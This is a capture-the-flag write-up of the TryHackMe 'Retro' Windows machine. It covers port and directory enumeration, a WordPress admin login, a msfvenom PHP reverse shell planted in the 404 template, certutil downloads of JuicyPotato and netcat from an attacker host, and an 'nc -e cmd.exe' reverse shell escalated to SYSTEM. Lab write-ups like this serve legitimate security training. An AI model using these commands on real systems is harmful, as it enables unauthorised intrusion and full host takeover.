Writeup Tryhackme Retro
Writeup about the Tryhackme machine Retro.
0 - Basic info
Unknown machine, black box
1 - Reconnaissance and enumeration
nmap -p- --open -T5 -v 10.10.π -n -Pn -oG ports.txt 1 β¨―
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-14 19:56 CEST
Initiating Connect Scan at 19:56
Scanning 10.10.π [65535 ports]
Discovered open port 3389/tcp on 10.10.π
Discovered open port 80/tcp on 10.10.π
Connect Scan Timing: About 23.38% done; ETC: 19:58 (0:01:42 remaining)
Connect Scan Timing: About 63.55% done; ETC: 19:58 (0:00:35 remaining)
Completed Connect Scan at 19:58, 97.12s elapsed (65535 total ports)
Nmap scan report for 10.10.π
Host is up (0.039s latency).
Not shown: 65533 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
3389/tcp open ms-wbt-server
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 97.31 seconds
Port 80,3389 open. Port 80 with IIS
Enumerating port 80 with gobuster
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.π
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.π
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/07/14 19:57:37 Starting gobuvster in directory enumeration mode
===============================================================
/retro (Status: 301) [Size: 149] [--> http://10.10.π/retro/]
/Retro (Status: 301) [Size: 149] [--> http://10.10.π/Retro/]
on the url path /retro there is a retro game museum:
There is a spicy link to upload images, but caution it is not the retro machine.
Also it is running a wordpress: http://10.10.π/retro/wp-login.php
2 - Vulnerability Identification
Wade is a legit user:
Also this looks like a password…
Worked so I got a valid login to the wordpress admin panel:
Checking for more users:
3 - Exploit
Like always I got access to a wordpres admin panel, I try to make the reverse shell/webshell on the 404 page:
I used a msfvenom to generate a php reverse shell
msfvenom -a php --platform php -p php/reverse_php LHOST=10.10.π LPORT=8080 -o shell.php
No encoder specified, outputting raw payload
Payload size: 3040 bytes
Saved as: shell.php
I placed the code on the 404.php page, using a obvious missing url path to trigger the shell:
http://10.10.π/retro/index.php/2019/12/09/hello-world/awesome
Worked so I got the reverse shell.
rlwrap -r nc -lvp 8080
listening on [any] 8080 ...
10.10.π: inverse host lookup failed: Unknown host
connect to [10.10.π] from (UNKNOWN) [10.10.π] 50481
4 - Post-Exploitation and privilege eescalation
Now it is time to get root. After some time enumerating I found this:
whoami /all
USER INFORMATION
----------------
User Name SID
================= ===============================================================
iis apppool\retro S-1-5-82-3788814120-2795558051-4026253505-1810414383-1644260341
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-82-0 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
ERROR: Unable to get user claims information.
SeImpersonatePrivilege Impersonate a client after authentication Enabled
Looks like it is vulnerable to juicy potato:
https://github.com/ohpe/juicy-potato
Setting up the executables needed and downloading the executables Nc, juicypotato and a bat script to trigger the nc reverse shell with the windows exploit:
certutil.exe -urlcache -f http://10.10.π:7777/JuicyPotato.exe C:\Windows\Temp\JuicyPotato.exe
certutil.exe -urlcache -f http://10.10.π:7777/nc64.exe C:\Windows\Temp\nc.exe
certutil.exe -urlcache -f http://10.10.π:7777/bat.bat C:\Windows\Temp\bat.bat
C:\Windows\Temp\nc.exe 10.10.π -e cmd.exe 10.10.π 1337
The bat script contains a simple nc reverse shell
C:\Windows\Temp\nc.exe 10.10.π -e cmd.exe 10.10.π 443
It is required to have a proper CLSID, I used one by default:
https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_Server_2016_Standard
XblGameSave {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}
C:\Windows\Temp\JuicyPotato.exe -p C:\Windows\Temp\bat.bat -l 1337 -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}
Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337
......
[+] authresult 0
{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
Listening on my machine:
rlwrap -r nc -lvp 443
Finally rooted and taking the flags:
Directory of C:\Users\Administrator\Desktop
12/08/2019 09:06 PM <DIR> .
12/08/2019 09:06 PM <DIR> ..
12/08/2019 09:08 PM 32 root.txt.txt
1 File(s) 32 bytes
2 Dir(s) 30,402,187,264 bytes free
type root.txt.txt
type root.txt.txt
7958π
Directory of C:\Users\Wade\Desktop
12/08/2019 09:09 PM <DIR> .
12/08/2019 09:09 PM <DIR> ..
12/08/2019 09:09 PM 32 user.txt.txt
1 File(s) 32 bytes
2 Dir(s) 30,402,187,264 bytes free
type user.txt.txt
type user.txt.txt
3b99π
Thanks for reading!